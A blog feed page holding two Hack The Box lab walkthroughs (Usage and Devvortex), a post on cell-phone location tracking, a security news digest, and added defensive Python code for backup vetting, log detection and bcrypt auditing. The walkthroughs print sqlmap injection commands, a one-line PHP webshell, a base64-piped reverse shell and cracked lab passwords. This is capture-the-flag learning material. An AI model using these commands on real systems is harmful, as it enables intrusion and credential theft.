Infosec Press


from 0x2501

Intro

Usage is a retired, easy-rated box on hackthebox. It features blind SQL injection, the exploitation of a vulnerable Laravel plugin, hash cracking and a wildcard spare trick.

Walkthrough

I started with a portscan.

22/tcp open ssh
80/tcp open http

The webserver redirects to usage.htb which I add to /etc/hosts. I then started a subdomain enumeration using ffuf.

ffuf -u 'http://usage.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.usage.htb" --fw 6

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://usage.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.usage.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6
________________________________________________

admin                   [Status: 200, Size: 3304, Words: 493, Lines: 89, Duration: 52ms]
:: Progress: [4989/4989] :: Job [1/1] :: 909 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

I get a hit on admin and add admin.usage.htb to /etc/hosts.

Having done some automatic enumeration, I start having a look at the base domain. I tested the account creation form for some basic SQL injection, mainly just inputting single quotes – nothing there. I then created an account and tested the /forgot-password endpoint with some basic injection techniques. Inputting a ' returns a 500 – Internal Server Error, which made me believe I had found a blind SQL injection.

I intercepted the request with Burp Suite, saved it to a file and then ran sqlmap using that request.

sqlmap -r forgot_pass.req

This gained me the following information:

  – Backend: MySQL > 5.0.12
  – Blind injectable
  – 8 columns

Which is not that much, but a start, especially considering that I just ran a tool. It's also a really good idea to RTFM, which leads to the following chain of commands (this takes a while to run!).

I first enumerated the used database, which gets me usage_blog.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email --current-db

I then enumerated all tables, which gets me admin_users as an interesting table.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog --tables 

I then dump the table admin_users.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog -T admin_users --dump

This gained me the following entry $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2,admin

Taking a look at the hashcat example hashes page, or using a script like hashid, shows that it's a bcrypt hash.

hashcat -m 3200 admin_db_hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

This gains admin:whatever1, which I used to log in to the web application.

The only thing that looked kind of interesting was the ability to upload a profile picture. I did some research on the displayed packages, which led me to CVE-2023-24249.

I used Burp Suite to proxy my requests and just followed the PoC. I had to activate the Follow Redirects option in the Repeater tab. Using the uploaded webshell can be a bit tricky because there's a cleanup script running which deletes the shell.

I am now logged in as dash, which gains me the user flag. The file .monitrc kind of sticks out. Having a look at the file I gain another set of credentials: admin:3nc0d3d_pa$$w0rd. I then looked for other users on that box.

grep -e 'sh$' /etc/passwd

Another user is xander. I tried using the pillaged password to login as xander, which worked.

Executing sudo -l shows that xander is allowed to run exactly one binary as root. One function of this binary is backing up the website. It uses 7zip to do so, which I can exploit.

  1. Create the file @root.txt in /var/www/html
  2. Create a symlink ln -s -r /root/root.txt root.txt in /var/www/html
  3. Execute the application. It will now output the root flag.
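The three steps above work because the backup wrapper passes whatever it finds in /var/www/html straight to 7-Zip: a file whose name starts with @ is read by 7-Zip as a list file of further paths to add, and a symlink inside the web root lets such an entry pull in a file from outside it. As an added example (not code from the walkthrough or from the box), here is how a privileged backup wrapper could vet its inputs before building the 7z command line. Everything here is my own: classify_entries, build_7z_command, build_demo_tree and the constructed temp directory are illustration names, and the link target is a placeholder.

```python
import os
import tempfile
from pathlib import Path

# The root step above relies on two things the backup wrapper let through:
# a file named "@root.txt", which 7-Zip treats as a list file of further paths
# to add, and a symlink inside the web root pointing at a file outside it.
REASON_LISTFILE = "name begins with '@' (7-Zip would read it as a list file)"
REASON_SYMLINK = "symbolic link (its target may lie outside the backup root)"
REASON_ESCAPE = "resolves to a location outside the backup root"


def classify_entries(root):
    """Walk root without following links and sort entries into accepted / rejected.

    Returns (accepted, rejected): accepted is a sorted list of file paths relative
    to root; rejected is a list of (relative path, reason) tuples.
    """
    root = Path(root).resolve()
    accepted, rejected = [], []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        here = Path(dirpath)
        for name in dirnames:           # symlinked dirs are listed but never entered
            p = here / name
            if p.is_symlink():
                rejected.append((str(p.relative_to(root)), REASON_SYMLINK))
        for name in filenames:
            p = here / name
            rel = str(p.relative_to(root))
            if name.startswith("@"):
                rejected.append((rel, REASON_LISTFILE))
            elif p.is_symlink():
                rejected.append((rel, REASON_SYMLINK))
            elif root not in p.resolve().parents:
                rejected.append((rel, REASON_ESCAPE))
            else:
                accepted.append(rel)
    accepted.sort()
    return accepted, rejected


def build_7z_command(root, archive):
    """Return the argv for an archive run over vetted paths, or raise if anything was rejected.

    Run it with cwd=root. "--" ends switch parsing so no path can turn into an
    option; -snl stores any link as a link instead of following it (on 7-Zip
    builds that support it), a second line of defence behind the rejection above.
    """
    accepted, rejected = classify_entries(root)
    if rejected:
        details = "; ".join(f"{path}: {reason}" for path, reason in rejected)
        raise ValueError(f"refusing to back up {root}: {details}")
    return ["7z", "a", "-snl", "--", str(archive), *accepted]


def build_demo_tree(include_bad=True):
    """Create a constructed web root in a temp dir; with include_bad, add the two
    entries from the walkthrough (an @-prefixed file and an outward symlink)."""
    root = Path(tempfile.mkdtemp(prefix="usage-demo-"))
    (root / "index.php").write_text("<?php // constructed sample ?>\n")
    (root / "assets").mkdir()
    (root / "assets" / "app.css").write_text("body {}\n")
    if include_bad:
        (root / "@root.txt").write_text("")
        # placeholder target; the link is rejected whether or not it exists
        (root / "root.txt").symlink_to("/placeholder/outside/the/web/root")
    return root


if __name__ == "__main__":
    for bad in (True, False):
        root = build_demo_tree(include_bad=bad)
        try:
            print(" ".join(build_7z_command(root, "site-backup.7z")))
        except ValueError as exc:
            print(exc)
```

Refusing the whole run rather than silently skipping the odd entries is deliberate: a backup job that quietly drops files is its own failure mode, and a rejected entry in a web root is something an operator should see. Whether "--" also stops @listfile parsing depends on the 7-Zip build; check the help output of the one you ship rather than relying on it.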

from Tai Lam on a Bike

I've sat in enough public meetings for municipal projects to know that there aren't enough literal sensors (yet) to differentiate between walkers, bikers, and motor vehicle drivers. However, a heuristic “hack” around this limitation is to use cell phone location data.

Apparently, it's a common practice for traffic studies to use cell phone location data to estimate the number of walkers, bikers, and drivers. This is just one method used by local transportation planners.

Your cell phone's location is being tracked all the time by the SIM card-based technology in it (or the eSIM equivalent, if you've been bamboozled by the iPhone 14 or newer iPhones that only use eSIM).

I remember an excerpt from The Daily Show With Trevor Noah in February 2020 about how a German artist pulled 99 smartphones in a wagon (with active cellular service, and presumably signed into a Google account) to create a fake traffic jam outside the German Google headquarters.

(Noah's comedic pretext for entering this line of thought was that there are traffic jams everywhere else now — as in, away from major roadways — due to the Waze app. Ironically, Google also owns Waze, so it's not like one can really escape car traffic in this regard.)

What I described above is what came to mind when I saw this video/article from CBS Boston, which mentions that Boston has the eighth worst traffic delays in the world. This news segment covers how Boston is 1 of 2 cities in the U.S. currently participating in the AI-based Project Green Light program from Google, which will manage traffic lights at intersections (as of August 9, 2024). (The other city at this time is Seattle, which is a bit obvious, as this is the largest international city closest to Microsoft's headquarters in Redmond, WA.)

Meanwhile, all I have on my mind is a linear combination of: Skynet taking over the world in the Terminator films; AM from the 1995 video game adaptation of I Have No Mouth, and I Must Scream (also where Russia and China have their own supercomputers — and these two other countries also pose critical cybersecurity threats IRL, as of August 2024); and how players can create traffic jams via their smartphones to stop pursuers while driving in the Watch Dogs video game series.

Though to be honest, the last Watch Dogs reference is probably the idea that's most likely to come true IRL, at least in the short-term future.

Also, this traffic program sounds a bit like greenwashing, as indicated in The Hated One's videos on water depletion from December 2021 regarding data centers in general requiring lots of water for cooling, and in April 2024 regarding AI data centers specifically.

Conclusion

The TV show Mr. Robot was right, leave your cell phone at home (i.e., still keep it turned on, but not with you when doing a surveillance detection route).

Your cell phone carrier will definitely sell cell phone location data to make a profit off you, and this isn't even due to any legitimate law enforcement request. (Sorry, FISA court requests don't count, at least to the EFF.) Your cell phone location data points are being sold to mapping services, bounty hunters, and probably some other unscrupulous entities. (The NSA doesn't even need to make its first-party interception setups anymore; instead, it simply buys internet data as a downstream technique in line with “harvest now, decrypt later”.)

Though to be fair, you as the cell phone network user likely allowed this to happen legally: it's probably hidden somewhere in your carrier's terms of service and/or privacy policy, which you accepted when you signed up for your cell phone plan.


from 📰wrzlbrmpft's cyberlights💥

A weekly shortlist of cyber security highlights. The short summaries are AI generated! If something is wrong, please let me know!


News For All

❌ Here’s How To Stop X From Using Your Data To Train Its AI privacy – X.ai, affiliated with Elon Musk's X network, utilizes Twitter data for AI training; users can opt out in settings. https://www.forbes.com/sites/johnkoetsier/2024/07/26/x-just-gave-itself-permission-to-use-all-your-data-to-train-grok/

®️ Mass surveillance as a service: the trade in location data privacy – Data brokers sell billions of location data points, threatening privacy and national security and raising concerns about espionage. Commercial surveillance infrastructure poses systemic problems. https://www.kuketz-blog.de/massenueberwachung-als-dienstleistung-der-handel-mit-standortdaten/

🫥 New Mandrake Android spyware version discovered on Google Play malware – Mandrake spyware resurfaces on Google Play with new evasion techniques, targeting users globally. Sophisticated malware embedded in file sharing app, using complex infection chain and anti-analysis methods. https://securelist.com/mandrake-apps-return-to-google-play/113147/

🖖 IBM, Nike, Disney, others caught in Proofpoint phish palaver security news – Phishing campaign exploited Proofpoint security gap, sending 3 million daily spoofed emails; blamed on insecure Proofpoint Microsoft 365 integration. https://www.theregister.com/2024/07/30/scammers_spoofed_emails/

🎣 A crafty phishing campaign targets Microsoft OneDrive users security news – A phishing campaign targets Microsoft OneDrive users with a PowerShell script through a deceptive email instructing users to fix a fake “Error 0x8004de86.” The attack tricks victims into running malicious commands for system compromise. https://securityaffairs.com/166312/hacking/microsoft-onedrive-phishing.html

🦈 'LockBit of phishing' EvilProxy used in 1M+ attacks monthly security news – EvilProxy, a phishing-as-a-service kit, leverages Cloudflare services to disguise traffic in phishing attacks targeting C-Suite executives. Attacks use redirection through legitimate sites, culminating in phishing Microsoft login pages. https://www.theregister.com/2024/07/30/evilproxy_phishing_kit_analysis/

🤑 Meta to pay Texas $1.4 billion to settle lawsuit alleging it illegally captured users’ faces privacy – Meta agrees to pay Texas $1.4 billion to settle a lawsuit over unauthorized use of facial recognition software on users, violating Texas law and consumer protection regulations. https://therecord.media/meta-texas-facial-recognition-settlement

🦆 Don’t Let Your Domain Name Become a “Sitting Duck” security news – Over a million vulnerable domains are at risk of takeover due to authentication weaknesses at hosting providers and registrars, allowing possible cybercriminal exploitation. https://krebsonsecurity.com/2024/07/dont-let-your-domain-name-become-a-sitting-duck/

💸 Scammer Allegedly Makes $600,000 a Month Holding Instagram Accounts Hostage cybercrime – Idriss Qibaa, aka 'Dani' and 'Unlocked,' allegedly extorted victims through locking their Instagram accounts, threatening them, demanding money to regain access, and using personal information for extortion. https://www.404media.co/unlocked4life-instagram-scam-no-jumper/

🧑‍💼 Germany summons Chinese ambassador over cyberattack on cartography agency security news – German authorities link a Beijing-backed threat actor to a 2021 cyberattack on the Federal Agency for Cartography and Geodesy, summoning the Chinese ambassador. https://therecord.media/germany-summons-chinese-ambassador-over-hack

🌐 Nearly 7% of Internet Traffic Is Malicious security news – Cloudflare reports 6.8% of Internet traffic is malicious, with CVEs exploited as quickly as 22 minutes after proof-of-concepts are published. https://www.schneier.com/blog/archives/2024/07/nearly-7-of-internet-traffic-is-malicious.html

🪝 Microsoft seizes domain used by Vietnamese group to sell fake accounts, services cybercrime – Microsoft seizes domain used by Vietnamese group selling fake accounts and services after previous seizures for creating fraudulent Microsoft accounts and CAPTCHA bypass services. https://cyberscoop.com/microsoft-seizes-domain-used-by-vietnamese-group-to-sell-fake-accounts-services/

💐 Begging for Bounties and More Info Stealer Logs cybercrime – Fraudsters try to extort bug bounties using stolen credentials from info stealer logs, which originated from victims' malware-infected devices, creating a malicious chain propagated on platforms like Telegram. https://www.troyhunt.com/begging-for-bounties-and-more-info-stealer-logs/ Personal comment: HIBP added a lot of new breaches this week – go check your accounts at https://haveibeenpwned.com/

💸 $75 Million Record-Breaking Ransom Paid To Cybercriminals, Say Researchers cybercrime – A record-breaking $75 million ransom was paid to Dark Angels ransomware group by an undisclosed Fortune 50 company. https://www.tripwire.com/state-of-security/75-million-record-breaking-ransom-paid-cybercriminals-say-researchers

💊 Pharma Giant Cencora confirmed the theft of personal and health information data breach – Pharmaceutical giant Cencora confirms theft of personal and health information in a data breach, affecting individuals' data, including personally identifiable information and protected health information. https://securityaffairs.com/166422/data-breach/cencora-confirmed-theft-pii-heath-data.html

📱 Keeping your Android device safe from text message fraud privacy – Covers SMS Blaster fraud, the threat of SMS phishing via cell-site simulators, and the Android security features that protect against it. https://security.googleblog.com/2024/08/keeping-your-android-device-safe-from.html

🚗 Ford wants patent for tech allowing cars to surveil and report speeding drivers privacy – Ford seeks patent for cars to surveil speeding drivers, sparking privacy concerns from advocates and experts. https://therecord.media/ford-seeks-patent-cars-surveil-speeders-report-to-police

🏈 NFL to roll out facial authentication software league-wide privacy – The NFL will implement facial authentication software at all 32 stadiums this season to enhance event security. The technology aims to streamline authentication processes for media, officials, and staff. Privacy advocates raise concerns, noting potential inaccuracies and discriminatory impacts of facial recognition technology. https://therecord.media/nfl-to-roll-out-facial-authentication-league-wide

📇 Hackers attempt to sell the personal data of 3 billion people resulting from an April data breach data breach – National Public Data, reportedly exposed the personal data of close to 3 billion people, disclosed by a threat actor named USDoD, who tried to sell the database for $3.5 million on the dark web. https://securityaffairs.com/166539/data-breach/personal-data-3-billion-people-data-breach.html


Some More, For the Curious

🌀 StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms security research – StormBamboo leverages ISP compromise to manipulate DNS updates, installing malware through insecure software updates on macOS and Windows. https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/

🚀🖨️ Reverse engineering the 59-pound printer onboard the Space Shuttle geeky news – The Space Shuttle's Interim Teleprinter, a stop-gap measure, remained in use for over 50 flights, printing thousands of lines; cost $1.5 million per flight. https://www.righto.com/2024/08/space-shuttle-interim-teleprinter.html

😞 Too big to care? – Our disappointment with Cloudflare’s anti-abuse posture cyber defense – Spamhaus criticizes Cloudflare for facilitating cybercriminal activity by providing services to abusive actors, despite having tools to prevent abuse. Calls for Cloudflare to suspend services to abusers. https://www.spamhaus.org/resource-hub/service-providers/too-big-to-care-our-disappointment-with-cloudflares-anti-abuse-posture/

🤖 Websites are Blocking the Wrong AI Scrapers (Because AI Companies Keep Making New Ones) security news – Website owners are struggling to block AI scrapers due to constantly changing crawler names and outdated robots.txt files. https://www.404media.co/websites-are-blocking-the-wrong-ai-scrapers-because-ai-companies-keep-making-new-ones/

⚙️ Zero Day Initiative — Breaking Barriers and Assumptions: Techniques for Privilege Escalation on Windows: Part 1 security research – “Link following” vulnerabilities on Windows involve applications improperly resolving filenames, allowing malicious users to redirect to unintended resources. Techniques to exploit these vulnerabilities using file operations are discussed with defensive strategies from developers. https://www.thezdi.com/blog/2024/7/29/breaking-barriers-and-assumptions-techniques-for-privilege-escalation-on-windows-part-1

✈️ Delta Air Lines may sue CrowdStrike, Microsoft over outage security news – Delta Air Lines considers legal action against CrowdStrike and Microsoft following operational losses of up to $500 million due to a recent outage that led millions of Windows machines offline. https://www.theregister.com/2024/07/30/crowdstrike_delta_microsoft_lawsuit/

🌋 'Error' in Microsoft's DDoS defenses amplified Azure outage security news – Microsoft's DDoS defenses amplified an Azure outage caused by a DDoS attack, triggering global service disruptions, despite the company's unique defense and threat intelligence capabilities. https://www.theregister.com/2024/07/31/microsoft_ddos_azure/

🌽 Driving lessons: The kernel drivers in Sophos Intercept X Advanced security research – Sophos Intercept X Advanced uses five kernel drivers; the post explains their functionality, security measures, customer options, gradual rollouts for software updates, and the risks of working in kernel space. https://news.sophos.com/en-us/2024/08/01/driving-lessons-the-kernel-drivers-in-sophos-intercept-x-advanced/

💵 Leaked ransomware variants give rise to new cybercrime groups cybercrime – Cybercriminals exploit leaked ransomware variants, forming groups utilizing multiple ransomware families for attacks and demanding bug bounties, leading to a rise in cybercrime and affiliate programs. https://securelist.com/sexi-key-group-mallox-ransomware/113183/

🛋️ Education in Secure Software Development security news – Survey by Linux Foundation and OpenSSF shows developers lack essential secure software development skills, raising concerns about software security. https://www.schneier.com/blog/archives/2024/08/education-in-secure-software-development.html

👿 Millions of Websites Susceptible to XSS Attack via OAuth Implementation Flaw vulnerability – Millions of websites vulnerable to XSS attack via OAuth due to flawed implementation, potentially leading to full account takeovers. https://www.securityweek.com/millions-of-websites-susceptible-xss-attack-via-oauth-implementation-flaw/

🛜 WifiForge – WiFi Exploitation for the Classroom hacking write-up – WifiForge, a program allowing safe WiFi hacking lessons through an interactive virtual network platform called Mininet-Wifi. WifiForge facilitates teaching various exploits with pre-built labs, such as WEP key-cracking, eliminating the need for physical network gear. https://www.blackhillsinfosec.com/wififorge/

🧐 One Does Not Simply … Get a Cybersecurity Job security news – Getting a cybersecurity job requires upskilling, certifications, networking, staying informed on trends, and focusing on job opportunities from within your network. https://www.guidepointsecurity.com/blog/one-does-not-simply-get-a-cybersecurity-job/


CISA Corner

⚠️ CISA Adds Three Known Exploited Vulnerabilities to Catalog vulnerability – CISA adds three actively exploited vulnerabilities to catalog: ServiceNow input validation issues and Acronis default password flaw. https://www.cisa.gov/news-events/alerts/2024/07/29/cisa-adds-three-known-exploited-vulnerabilities-catalog

⚠️ CISA Adds One Known Exploited Vulnerability to Catalog vulnerability – CVE-2024-37085 VMware ESXi Authentication Bypass. https://www.cisa.gov/news-events/alerts/2024/07/30/cisa-adds-one-known-exploited-vulnerability-catalog

🍏 Apple Releases Security Updates for Multiple Products vulnerability – Apple issued security updates for Safari, iOS, iPadOS, macOS, watchOS, tvOS, and visionOS. https://www.cisa.gov/news-events/alerts/2024/07/30/apple-releases-security-updates-multiple-products

⏰ DigiCert Certificate Revocations security news – DigiCert is revoking TLS certificates due to a domain control verification issue, potentially causing temporary disruptions, with updated information available on their status page. https://www.cisa.gov/news-events/alerts/2024/07/30/digicert-certificate-revocations

🧑‍🏭 CISA Releases Nine Industrial Control Systems Advisories vulnerability – Vulnerabilities in various systems, including Johnson Controls, AVTECH IP Camera, Vonets WiFi Bridges, and Rockwell Automation Logix Controllers. https://www.cisa.gov/news-events/alerts/2024/08/01/cisa-releases-nine-industrial-control-systems-advisories


from 0x2501

Intro

Devvortex is a retired, easy-rated box on hackthebox. It features exploitation of a content management system, hash cracking and exploiting an application to escalate privileges on a Linux machine.

Walkthrough

Enumeration

Let's start with an nmap scan.

22 open ssh
80 open http

Accessing the webserver at port 80 redirects us to devvortex.htb, so let's add this one to /etc/hosts. The site doesn't look too interesting. Maybe there are other sites hosted here.

Using ffuf to enumerate other sites:

ffuf -u http://devvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host: FUZZ.devvortex.htb' --fw 4

We get a hit on dev.devvortex.htb, so let's add that to our hosts file.

Before starting any sort of manual enumeration, let's fuzz for some interesting endpoints:

ffuf -u http://dev.devvortex.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt --fs 162

We get a hit on /administrator. Navigating to that endpoint shows that Joomla is used as a CMS. A way to enumerate Joomla's version is accessing the joomla.xml file, which is usually at administrator/manifests/files/joomla.xml. Accessing this file shows that Joomla version 4.2.6 is running.

Conducting a quick search, we find out that this version is vulnerable to CVE-2023-23752 for which public exploits exist.

Exploiting a vulnerable Joomla version

Let's have a quick look at the exploit:

[...]
def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end
[...]
def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end
[...]

Seems like we just have to access these endpoints.

curl -s http://dev.devvortex.htb/api/index.php/v1/users?public=true | jq
[...]
  "data": [
    {
      "type": "users",
      "id": "649",
      "attributes": {
        "id": 649,
        "name": "lewis",
        "username": "lewis",
        "email": "lewis@devvortex.htb",
        "block": 0,
        "sendEmail": 1,
        "registerDate": "2023-09-25 16:44:24",
        "lastvisitDate": "2023-10-29 16:18:50",
        "lastResetTime": null,
        "resetCount": 0,
        "group_count": 1,
        "group_names": "Super Users"
      }
    },
[...]
curl -s http://dev.devvortex.htb/api/index.php/v1/config/application?public=true | jq
[...]
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
[...]

I only included the interesting bits. Using the leaked credentials we are able to log in.
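Both walkthroughs on this page leave a footprint in the web server's access log: the sqlmap run against /forgot-password on Usage produces a burst of 500 responses from one client with a scanner User-Agent (the injected payload itself is in the POST body and never reaches the log), and the two unauthenticated Joomla API reads above are plain GET requests for /api/index.php/v1/users and /api/index.php/v1/config/application with public=true that answer 200. As an added example, not code from either post, here is a small detector in Python that runs those three checks over constructed combined-format log lines. The rule names, the threshold and the sample lines are my own.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache/Nginx "combined" access-log format. The body of a POST is not logged,
# so injection payloads sent to /forgot-password are invisible here and the
# detection has to rest on side effects: error bursts and scanner User-Agents.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Joomla REST endpoints the Devvortex exploit fetched; CVE-2023-23752 made them
# answer unauthenticated requests that carried public=true.
JOOMLA_LEAK_RE = re.compile(r"^/api/index\.php/v1/(config/application|users)$")

ERROR_BURST_THRESHOLD = 5   # constructed policy value: 5xx hits per (ip, path) before alerting


def parse_line(line):
    """Return a dict of fields for one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)
    return rec


def analyze(lines):
    """Run the three detections over an iterable of log lines; return a list of alerts."""
    alerts = []
    scanner_hits = Counter()
    error_hits = Counter()
    for raw in lines:
        rec = parse_line(raw.strip())
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        if "sqlmap" in rec["ua"].lower():
            scanner_hits[key] += 1
        if 500 <= rec["status"] <= 599:
            error_hits[key] += 1
        if (rec["status"] == 200 and JOOMLA_LEAK_RE.match(rec["path"])
                and rec["query"].get("public") == ["true"]):
            alerts.append({"rule": "joomla-api-public-leak", "ip": rec["ip"],
                           "path": rec["path"]})
    for (ip, path), n in scanner_hits.items():
        alerts.append({"rule": "scanner-user-agent", "ip": ip, "path": path, "count": n})
    for (ip, path), n in error_hits.items():
        if n >= ERROR_BURST_THRESHOLD:
            alerts.append({"rule": "server-error-burst", "ip": ip, "path": path, "count": n})
    return alerts


# Constructed sample log: six sqlmap probes against /forgot-password that each
# hit a 500, the two Joomla API reads, and two benign lines that must not alert.
SAMPLE_LOG = """\
10.10.14.5 - - [13/Apr/2024:16:10:01 +0000] "POST /forgot-password HTTP/1.1" 500 1203 "-" "sqlmap/1.8.3#stable (https://sqlmap.org)"
10.10.14.5 - - [13/Apr/2024:16:10:01 +0000] "POST /forgot-password HTTP/1.1" 500 1203 "-" "sqlmap/1.8.3#stable (https://sqlmap.org)"
10.10.14.5 - - [13/Apr/2024:16:10:02 +0000] "POST /forgot-password HTTP/1.1" 500 1203 "-" "sqlmap/1.8.3#stable (https://sqlmap.org)"
10.10.14.5 - - [13/Apr/2024:16:10:02 +0000] "POST /forgot-password HTTP/1.1" 500 1203 "-" "sqlmap/1.8.3#stable (https://sqlmap.org)"
10.10.14.5 - - [13/Apr/2024:16:10:03 +0000] "POST /forgot-password HTTP/1.1" 500 1203 "-" "sqlmap/1.8.3#stable (https://sqlmap.org)"
10.10.14.5 - - [13/Apr/2024:16:10:03 +0000] "POST /forgot-password HTTP/1.1" 500 1203 "-" "sqlmap/1.8.3#stable (https://sqlmap.org)"
10.10.14.5 - - [13/Apr/2024:16:20:11 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 1540 "-" "curl/8.5.0"
10.10.14.5 - - [13/Apr/2024:16:20:15 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 812 "-" "curl/8.5.0"
10.10.14.9 - - [13/Apr/2024:16:21:00 +0000] "GET /api/index.php/v1/users HTTP/1.1" 401 97 "-" "Mozilla/5.0"
10.10.14.9 - - [13/Apr/2024:16:21:30 +0000] "GET /index.php HTTP/1.1" 200 4211 "http://dev.devvortex.htb/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG.splitlines()):
        print(alert)
```

The User-Agent rule is the weakest of the three, since sqlmap can be told to use any string; the error burst and the successful reads of the two Joomla endpoints do not depend on the client being honest, which is why the sample log keeps all three.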

Gaining RCE on the box

As an admin we can add code to various templates. I decided to add a webshell to error.php and then use it to gain a reverse shell.

Webshell:

<?php echo Text::_(system($_GET['cmd'])); ?>

Accessing the webshell: http://dev.devvortex.htb/media/templates/site/cassiopeia/js/main.js?cmd=$COMMAND

Reverse Shell

echo "$base64_encoded_reverse_shell" | base64 -d | bash

Host Enumeration

We can already assume that some sort of database is running, but let's confirm this by running netstat -tulnp. This shows that a database service is listening on its default port. We can connect to it using lewis' credentials. Then just dump the user table.

Dumping Credentials and cracking hashes

mysql> select * from sd4fg_users;

lewis:$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

Let's check if a user named logan exists on this box, grep logan /etc/passwd. Logan is a user on this machine.

I decided to use john to crack Logan's hash.

john --format=bcrypt hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

tequieromucho    (?)    

1g 0:00:00:05 DONE (2024-04-13 16:24) 0.1992g/s 279.6p/s 279.6c/s 279.6C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

This gains us logan:tequieromucho.
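Both boxes store passwords as bcrypt, recognisable from the $2y$10$ prefix that the Usage walkthrough identifies via the hashcat example hashes page, and the cost field is what john reports above as "Cost 1 (iteration count) is 1024" (2^10). As an added example that is not part of either post, here is a Python parser that splits a bcrypt string into variant, cost, salt and digest and applies a storage-policy check to the three hashes from this page; parse_bcrypt, audit_cost and the minimum cost of 12 are my own names and a hypothetical policy value.

```python
import re

# Modular-crypt form of a bcrypt hash: $<variant>$<cost>$<22-char salt><31-char digest>,
# salt and digest in bcrypt's own base64 alphabet (./A-Za-z0-9). Always 60 characters.
_BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)


def parse_bcrypt(hash_str):
    """Split a bcrypt hash into its fields and derive the work factor.

    Raises ValueError for anything that is not a well-formed bcrypt string, so an
    audit over a user table fails loudly on MD5/SHA-1 values instead of skipping them.
    """
    m = _BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt modular-crypt hash")
    cost = int(m.group("cost"))
    if not 4 <= cost <= 31:
        raise ValueError(f"bcrypt cost {cost} outside the valid range 4..31")
    return {
        "variant": m.group("variant"),
        "cost": cost,
        "iterations": 2 ** cost,   # what john prints as "iteration count"
        "salt": m.group("salt"),
        "digest": m.group("digest"),
    }


def audit_cost(hash_str, minimum_cost=12):
    """Policy check: is the stored hash at least as expensive as we require?

    minimum_cost=12 is a hypothetical policy value, not something from the boxes.
    """
    info = parse_bcrypt(hash_str)
    if info["cost"] < minimum_cost:
        return False, (f"cost {info['cost']} ({info['iterations']} iterations) is below "
                       f"the required {minimum_cost}; rehash on next successful login")
    return True, f"cost {info['cost']} meets policy"


# The three hashes exactly as they appear in the walkthroughs above:
# admin from Usage, lewis and logan from Devvortex.
SAMPLE_HASHES = {
    "admin": "$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2",
    "lewis": "$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u",
    "logan": "$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12",
}

if __name__ == "__main__":
    for user, h in SAMPLE_HASHES.items():
        info = parse_bcrypt(h)
        ok, msg = audit_cost(h)
        print(f"{user}: ${info['variant']}$ {msg} -> {'OK' if ok else 'WEAK'}")
```

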